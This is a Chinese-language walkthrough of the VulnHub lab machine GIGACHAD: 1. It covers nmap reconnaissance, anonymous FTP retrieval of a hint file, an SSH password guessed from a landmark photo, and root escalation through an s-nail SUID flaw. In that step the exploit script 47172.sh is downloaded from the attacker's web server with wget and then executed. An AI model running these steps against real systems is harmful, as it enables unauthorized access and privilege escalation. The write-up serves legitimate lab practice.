一、前言
主要利用方式:FTP任意用户登录获取核心路径+看图猜密码突破边界
suid及拥有suid权限的应用漏洞本地权限提升
二、靶机信息
靶场: vulnhub.com
靶机名称: GIGACHAD: 1
难度: easy
发布时间: 2021 年 3月 6日
下载地址:https://www.vulnhub.com/entry/gigachad-1,657/
备注:靶机的难度是eaxy,看图猜密码也就老外能玩出花。
挨个排查suid权限+存在漏洞应用的本地提权脚本还需要多执行几次才能成功
三、虚拟机配置
VirtualBox、网络连接模式:NAT模式、DHCP服务:启用、IP地址:自动分配
四、信息收集
1、探测靶机ip地址
└─$ sudo arp-scan -I eth0 -l
2、探测靶机ip端口及端口具体服务
└─$ sudo nmap -p- 10.0.2.12
└─$ sudo nmap -p22,80 -sV -A 10.0.2.12
3、21端口存在ftp匿名用户登录。登录后发现了一个文件
4、ftp用get下载到本地,并查看
ftp> get chadinfo
└─$ cat chadinfo
/重要提示/
(文件提示:username is chad ,password:go to )
5、扫描一下靶机80端口的常规路径,以及访问ftp撸到的路径
6、扫描到很多路径,但访问了之后,都有固定的xx.php项目,但访问都是类似的页面
7、ftp获取到的路径
http://10.0.2.12/drippinchad.png
(通过提示与百度识图,得知图中建筑为:Maiden’s Tower
是位于土耳其最大的海港城市伊斯坦布尔的少女塔)
五、漏洞利用(突破边界)
8、猜测的第一个密码组合,然后通过22端口登录,查看id以及获取第一个flag
(用户名:chad/密码:maidenstower)
└─$ ssh chad@10.0.2.12
chad@gigachad:~$ id
chad@gigachad:~$ cat user.txt
六、提权
9、sudo 用不了,就找一下拥有suid权限
10、从下至上排查,无suid的shell命令,只能查到s-nail存在本地提权漏洞
11、下载并查看利用文件,并开启web服务,以备靶机下载
└─$ python -m http.server 80
12、靶机下载sh文件,赋权并执行.sh文件
chad@gigachad:~$ wget 10.0.2.7/47172.sh
chad@gigachad:~$ chmod 777 47172.sh
chad@gigachad:~$ ./47172.sh (要多提交几次,才能提示成功)
13、成功执行,查看id,root权限的flag,以及证明的靶机IP